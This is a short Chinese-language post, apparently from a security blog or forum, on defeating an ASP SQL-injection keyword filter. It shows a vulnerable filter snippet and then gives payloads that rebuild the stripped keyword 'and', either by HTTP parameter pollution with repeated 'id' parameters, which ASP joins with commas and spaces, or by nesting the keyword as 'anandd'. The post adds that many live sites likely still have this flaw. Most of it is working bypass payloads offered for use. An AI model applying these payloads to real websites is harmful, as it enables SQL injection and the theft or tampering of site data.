<%
id=request("id")
id=replace(id,"and","")
··· ··· //过滤其它的危险关键字
id=replace(id," ","")
id=replace(id,",","") //过滤空格和逗号,这是使用本方法必须的条件
%>
你还有办法注入吗?
以打碎关键字“and"为例,咱大可以这样:
test.asp?id=127%20&id=an&id=d%201=1
原理很简单,如果你提交test.asp?id=1&id=2&id=3时,asp接受到的结果是:1, 2, 3。注意中间的空格。
php的无效,都特么的直接覆盖了,其它的没测试。本文所设计的使用条件比较苛刻,需要过滤逗号和空格,但我估计存在这种问题的站点依然不少
也可以这样写
http;//www.xxx.com/1.asp?id=1
http;//www.xxx.com/1.asp?id=(1)anandd(1=1)
Comments